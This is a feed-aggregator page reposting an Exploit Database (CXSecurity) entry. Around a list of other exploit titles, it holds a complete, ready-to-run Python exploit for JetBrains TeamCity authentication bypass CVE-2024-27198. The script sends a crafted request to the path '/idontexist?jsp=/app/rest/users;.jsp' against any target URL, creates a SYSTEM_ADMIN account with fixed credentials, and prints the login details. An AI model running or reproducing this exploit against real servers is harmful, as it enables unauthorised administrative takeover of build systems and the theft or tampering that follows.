惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

S
SegmentFault 最新的问题
A
About on SuperTechFans
NISL@THU
NISL@THU
V
Visual Studio Blog
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
B
Blog RSS Feed
Engineering at Meta
Engineering at Meta
GbyAI
GbyAI
美团技术团队
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
Google DeepMind News
Google DeepMind News
小众软件
小众软件
博客园 - Franky
罗磊的独立博客
The Cloudflare Blog
H
Hackread – Cybersecurity News, Data Breaches, AI and More
酷 壳 – CoolShell
酷 壳 – CoolShell
量子位
Hugging Face - Blog
Hugging Face - Blog
云风的 BLOG
云风的 BLOG
MongoDB | Blog
MongoDB | Blog
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
B
Blog
The GitHub Blog
The GitHub Blog
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
P
Proofpoint News Feed
有赞技术团队
有赞技术团队
Hacker News - Newest:
Hacker News - Newest: "LLM"
Cyberwarzone
Cyberwarzone
C
CXSECURITY Database RSS Feed - CXSecurity.com
Project Zero
Project Zero
Security Latest
Security Latest
L
Lohrmann on Cybersecurity
AWS News Blog
AWS News Blog
The Hacker News
The Hacker News
I
Intezer
J
Java Code Geeks
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
P
Privacy International News Feed
月光博客
月光博客
A
Arctic Wolf
Apple Machine Learning Research
Apple Machine Learning Research
D
Darknet – Hacking Tools, Hacker News & Cyber Security
博客园_首页
WordPress大学
WordPress大学
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
T
Tor Project blog
博客园 - 三生石上(FineUI控件)
The Last Watchdog
The Last Watchdog
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org

The Exploit Database - CXSecurity.com

XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 ePati Antikor NGFW 2.0.1301 Authentication Bypass Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service NiceGUI 3.6.1 Path Traversal - CXSecurity.com Green Hills INTEGRITY RTOS IPCOMShell TELNET Format String Vulnerability - Realistic Full Chain Attack on F-16 Avionics (Ground Maintenance Scenario) OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass Kanboard <= 1.2.50 Authenticated SQL Injection OpenClaw tools.exec.safeBins <= 2026.2.22 Remote Code Execution Google Chrome < 145.0.7632.75 - CSSFontFeatureValuesMap Use-After-Free Siklu EtherHaul Series EH-8010 Remote Command Execution aiohttp 3.9.1 Directory Traversal - CXSecurity.com deephas <= 1.0.7 - Prototype Pollution leading to Arbitrary Code Execution / DoS LangChain Core - Serialization Injection to Jinja2 SSTI/RCE AVideo Notify.ffmpeg.json.php Unauthenticated Remote Code Execution Birth Chart Compatibility WordPress Plugin 2.0 Full Path Disclosure dotCMS 25.07.02-1 Authenticated Blind SQL Injection Mbed TLS 3.6.4 Use-After-Free - CXSecurity.com MonstaFTP Unauthenticated File Upload - CXSecurity.com Flowise 3.0.4 Remote Code Execution Swagger UI 1.0.3 Cross-Site Scripting (XSS) Vvveb CMS 1.0.5 Remote Code Execution SugarCRM unauthenticated Remote Code Execution (RCE) Belkin F9K1009 F9K1010 2.00.04/2.00.09 Hard Coded Credentials Commvault CLI Argument Injection / Traversal / Remote Code Execution Sitecore XP Post-Authentication File Upload Ultimate Member WordPress Plugin 2.6.6 Privilege Escalation Ghost CMS 5.59.1 Arbitrary File Read DOS Baby POP3 Server 1.04 Tenda AC20 16.03.08.12 Command Injection Projectworlds Online Admission System 1.0 SQL Injection Cisco ISE 3.0 Remote Code Execution Pandora ITSM Authenticated Command Injection Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE Malicious XDG Desktop File - CXSecurity.com Langflow 1.2.x Remote Code Execution (RCE) Microsoft Excel LTSC 2024 Remote Code Execution Adobe ColdFusion 2023.6 Remote File Read Malicious Windows Registration Entries (.reg) File Microsoft PowerPoint 2019 Remote Code Execution (RCE) Discourse 3.2.x Anonymous Cache Poisoning VBA Bypass Windows Defender Exploit PoC Social Warfare WordPress Plugin 3.5.2 Remote Code Execution (RCE) PHP CGI Module 8.3.4 Remote Code Execution Grandstream GSD3710 1.0.11.13 Stack Overflow Parrot and DJI variants Drone OSes Kernel Panic Exploit
JetBrains TeamCity 2023.11.4 Authentication Bypass
2025-08-11 · via The Exploit Database - CXSecurity.com

JetBrains TeamCity 2023.11.4 Authentication Bypass

#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ # Exploit Title: JetBrains TeamCity 2023.11.4 - Authentication Bypass # Date: 2024-02-21 # Exploit Author: ibrahimsql (https://github.com/ibrahimsql) # Vendor Homepage: https://www.jetbrains.com/teamcity/ # Version: < 2023.11.4 # CVE: CVE-2024-27198 # CVSS Score: 9.8 (Critical) # Description: # JetBrains TeamCity before version 2023.11.4 contains a critical authentication bypass # vulnerability that allows unauthenticated attackers to perform administrative actions. # The vulnerability leverages a path traversal-like technique in the JSP handling # mechanism combined with REST API endpoints to bypass authentication. # Requirements: requests>=2.25.1 """ import requests import argparse import sys import json from urllib.parse import urlparse requests.packages.urllib3.disable_warnings() class Colors: RED = '\033[91m' GREEN = '\033[92m' YELLOW = '\033[93m' BLUE = '\033[94m' CYAN = '\033[96m' BOLD = '\033[1m' END = '\033[0m' banner = f"""{Colors.CYAN} ████████╗███████╗ █████╗ ███╗ ███╗ ██████╗██╗████████╗██╗ ██╗ ╚══██╔══╝██╔════╝██╔══██╗████╗ ████║██╔════╝██║╚══██╔══╝╚██╗ ██╔╝ ██║ █████╗ ███████║██╔████╔██║██║ ██║ ██║ ╚████╔╝ ██║ ██╔══╝ ██╔══██║██║╚██╔╝██║██║ ██║ ██║ ╚██╔╝ ██║ ███████╗██║ ██║██║ ╚═╝ ██║╚██████╗██║ ██║ ██║ ╚═╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝ ╚═╝ {Colors.END} {Colors.BOLD}{Colors.RED} TeamCity Authentication Bypass (CVE-2024-27198){Colors.END} {Colors.YELLOW} Author: ibrahimsql{Colors.END} """ parser = argparse.ArgumentParser(description="TeamCity Authentication Bypass Exploit (CVE-2024-27198)") parser.add_argument("--url", type=str, required=True, help="Target TeamCity URL") parser.add_argument("--timeout", type=int, default=15, help="Request timeout (default: 15)") parser.add_argument("--verbose", "-v", action="store_true", help="Enable verbose output") args = parser.parse_args() class TeamCityExploit: def __init__(self, target_url, timeout=15, verbose=False): self.target_url = target_url.rstrip('/') self.timeout = timeout self.verbose = verbose self.session = requests.Session() def _log(self, message, level="info"): if level == "success": print(f"{Colors.GREEN}[+] {message}{Colors.END}") elif level == "error": print(f"{Colors.RED}[-] {message}{Colors.END}") elif level == "warning": print(f"{Colors.YELLOW}[!] {message}{Colors.END}") elif level == "info": print(f"{Colors.BLUE}[*] {message}{Colors.END}") elif level == "verbose" and self.verbose: print(f"[DEBUG] {message}") def check_target_reachability(self): try: self._log(f"Checking target: {self.target_url}") response = self.session.get(self.target_url, verify=False, timeout=self.timeout) if response.status_code in [200, 302, 401, 403]: self._log("Target is reachable", "success") return True else: self._log(f"Unexpected status: {response.status_code}", "error") return False except requests.exceptions.Timeout: self._log("Connection timeout", "error") return False except requests.exceptions.ConnectionError: self._log("Connection error", "error") return False except Exception as e: self._log(f"Error: {str(e)}", "error") return False def exploit_authentication_bypass(self): exploit_path = "/idontexist?jsp=/app/rest/users;.jsp" full_url = f"{self.target_url}{exploit_path}" self._log(f"Targeting: {full_url}") headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Accept": "application/json, text/plain, */*" } payload = { "username": "ibrahimsql", "password": "ibrahimsql", "email": "ibrahimsql@exploit.local", "roles": { "role": [{ "roleId": "SYSTEM_ADMIN", "scope": "g" }] } } self._log(f"Payload: {json.dumps(payload)}", "verbose") try: self._log("Attempting authentication bypass...") response = self.session.post(full_url, headers=headers, verify=False, json=payload, timeout=self.timeout) self._log(f"Status: {response.status_code}", "verbose") self._log(f"Response: {response.text[:200]}", "verbose") if response.status_code == 200: self._log("Exploit successful!", "success") print(f"\n{Colors.BOLD}{Colors.GREEN}[SUCCESS] Admin user created!{Colors.END}") print(f"{Colors.CYAN}{'='*50}{Colors.END}") print(f"{Colors.YELLOW}Username:{Colors.END} ibrahimsql") print(f"{Colors.YELLOW}Password:{Colors.END} ibrahimsql") print(f"{Colors.YELLOW}Login URL:{Colors.END} {self.target_url}/login.html") print(f"{Colors.CYAN}{'='*50}{Colors.END}") return True elif response.status_code == 401: self._log("Authentication required - target may be patched", "error") return False elif response.status_code == 404: self._log("Endpoint not found - target may be patched", "error") return False elif response.status_code == 403: self._log("Access forbidden", "error") return False else: self._log(f"Unexpected status: {response.status_code}", "error") return False except requests.exceptions.Timeout: self._log("Request timeout", "error") return False except requests.exceptions.ConnectionError: self._log("Connection error", "error") return False except Exception as e: self._log(f"Error: {str(e)}", "error") return False def validate_url(url): try: parsed = urlparse(url) if not parsed.scheme: url = f"http://{url}" parsed = urlparse(url) if parsed.scheme not in ['http', 'https']: raise ValueError("URL must use HTTP or HTTPS") if not parsed.netloc: raise ValueError("Invalid URL format") return url except Exception as e: raise ValueError(f"Invalid URL: {str(e)}") def main(): print(banner) try: target_url = validate_url(args.url) print(f"{Colors.BOLD}{Colors.CYAN}=== CVE-2024-27198 TeamCity Exploit ==={Colors.END}") print(f"{Colors.YELLOW}Author:{Colors.END} ibrahimsql") print(f"{Colors.YELLOW}Target:{Colors.END} {target_url}") print(f"{Colors.CYAN}{'='*45}{Colors.END}\n") exploit = TeamCityExploit(target_url=target_url, timeout=args.timeout, verbose=args.verbose) if not exploit.check_target_reachability(): exploit._log("Cannot reach target", "error") sys.exit(1) success = exploit.exploit_authentication_bypass() if success: exploit._log("Exploit completed!", "success") sys.exit(0) else: exploit._log("Exploit failed", "error") sys.exit(1) except ValueError as e: print(f"{Colors.RED}[-] {str(e)}{Colors.END}") sys.exit(1) except KeyboardInterrupt: print(f"\n{Colors.YELLOW}[!] Interrupted{Colors.END}") sys.exit(1) except Exception as e: print(f"{Colors.RED}[-] Error: {str(e)}{Colors.END}") sys.exit(1) if __name__ == "__main__": main()



 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}